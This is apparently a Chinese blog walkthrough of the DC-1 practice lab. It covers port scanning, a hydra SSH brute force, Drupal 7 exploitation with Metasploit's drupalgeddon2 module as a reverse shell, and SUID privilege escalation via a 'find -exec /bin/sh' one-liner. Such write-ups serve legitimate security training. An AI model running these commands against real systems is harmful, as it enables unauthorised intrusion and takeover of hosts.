当前位置: 首页 > article >正文

OSCP系列靶场-Esay-DC-1

目录

总结

准备工作

信息收集-端口扫描

目标开放端口收集

目标端口对应服务探测

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(pass)

22-SSH手动登录尝试(失败)

22-SSH弱口令爆破(爆破着玩)

80-HTTP端口的信息收集

信息收集-网站指纹

漏洞利用-网站指纹

其他端口的信息收集

漏洞利用-getwebshell

内网遨游-getshell

交互shell

FLAG1获取

权限提升

Linux提权-sudo提权尝试(失败)

Linux提权-suid提权尝试

FLAG2获取


总结

getwebshell → 发现CMS → MSF远程反弹SHELL

提 权 思 路 → 发现SUID-FIND → FIND提权

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.167

图片

  • 启动靶机
    获取目标机器IP > 192.168.223.193

图片

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次

    sudo nmap --min-rate 10000 -p- 192.168.223.193

sudo nmap -sU --min-rate 10000 -p- 192.168.223.193

图片


通过两次收集到的端口:→22,80,111,46232,53990

目标端口对应服务探测

通常udp端口测不出啥,主要探测tcp

# tcp探测

sudo nmap -sT -sV -O -sC -p22,80,111,46232,53990 192.168.223.193

图片

图片

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(pass)

通过Nmap探测获得SSH的版本信息,可以尝试利用
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)


# 进入msf OpenSSH 6.0p1

msfconsole

# 搜索对应脚本

msf6 > searchsploit openssh 6.0p1

图片

22-SSH手动登录尝试(失败)

尝试root账户的密码爆破发现报错之后进行手动尝试

ssh root@192.168.223.193 -p 22

# 密码尝试

password > root

说明支持密码登录,但是密码不对

图片

22-SSH弱口令爆破(爆破着玩)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.223.193 ssh -s 22

在等待结果的同时让我们尝试使用另外的信息收集

图片

80-HTTP端口的信息收集

访问 http://192.168.223.193:80 发现是一个有名的CMS

信息收集-网站指纹
whatweb -v http://192.168.223.193:80

确认了CMS的版本信息 Drupal 7

图片

漏洞利用-网站指纹

既然确定了版本,直接上工具

msfconsole



searchsploit Drupal 7

查看了一下

图片

其他端口的信息收集

不需要啦~

漏洞利用-getwebshell

觉得还是远程执行的exp比较好

search Drupal 7

>use exploit/unix/webapp/drupal_drupalgeddon2

选一个时间靠后并且Rank比较高的

# 感觉只要设置攻击机以及监听端口,还有目标机器

show options
# 感觉只要设置攻击机以及监听端口,还有目标机器

show options

# 设置个反弹shell

show payloads

set payload 3
​​​​​​​

图片


# 配置MSF

set lhost 192.168.45.208

set lport 5555

set rhosts 192.168.230.193

set rport 80

run

成功getwebshell

图片

内网遨游-getshell

交互shell

由于获取的shell交互不友好,使用shell先获取shell

# 利用shell命令获取shell

meterpreter > shell

Process 4192 created.

Channel 0 created.

pwd

/var/www

whoami

www-data

# 利用python获取交互shell -> python失败使用python3

python -c "import pty;pty.spawn('/bin/bash')";

www-data@DC-1:/var/www$

图片

FLAG1获取​​​​​​​

www-data@DC-1:/var/www$ find / -name local.txt 2>/dev/null

find / -name local.txt 2>/dev/null

/home/local.txt

www-data@DC-1:/var/www$ cat /home/local.txt

cat /home/local.txt

******************

图片

权限提升

Linux提权-sudo提权尝试(失败)

查找具有sudo权限,且不需要密码的可提权文件​​​​​​​

# 利用sudo -l寻找

sudo -l

图片

Linux提权-suid提权尝试​​​​​​​

# -perm 文件权限

find / -perm -u=s -type f 2>/dev/null

图片


如果发现有东西的话 访问 https://gtfobins.github.io 寻找

图片

 
# 查找文件提权

find . -exec '/bin/sh' \;

提权成功

图片

FLAG2获取​​​​​​​

# cat /root/proof.txt

cat /root/proof.txt

****************

完结撒花~

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线


http://www.kler.cn/a/135050.html

相关文章:

  • HTTP常见的请求头有哪些?都有什么作用?在 Web 应用中使用这些请求头?
  • ubuntu-desktop-24.04上手指南(更新阿里源、安装ssh、安装chrome、设置固定IP、安装搜狗输入法)
  • 密码学的基本原理
  • Android Framework AMS(16)进程管理
  • Unity3D学习FPS游戏(12)敌人检测和攻击玩家
  • 【前端】Vue中如何避免出现内存泄漏
  • 在 Qt 框架中,有许多内置的信号可用于不同的类和对象\triggered
  • 数据结构【DS】数组
  • IDEA常用插件合集
  • 产业区块链生态日:你的故事,我们在等待 | 征集帖
  • 软文推广如何实现效果?媒介盒子为你支招
  • 选择java商城开发商需要注意哪些方面?
  • Web前端—小兔鲜儿电商网站底部设计及网站中间过渡部分设计
  • Vue 路由缓存 防止路由切换数据丢失 路由的生命周期
  • 虾皮台湾站点如何选品
  • 关于代码混淆,看这篇就够了
  • NX二次开发UF_CAM_ask_f_s_db_object 函数介绍
  • redis+python 建立免费http-ip代理池;验证+留接口
  • IC卡操作软件支持PN532
  • python 集合(set)
  • 基于 FFmpeg 的跨平台视频播放器简明教程(十一):一种简易播放器的架构介绍
  • 如何解决swagger-editor在线接口调试时的跨域问题
  • 海外IP代理如何助力跨境电商?
  • 海外媒体发稿:出口贸易媒体发稿16个超实用技巧-华媒舍
  • 系列九、JUC强大的辅助类
  • 3.ubuntu20.04环境的ros搭建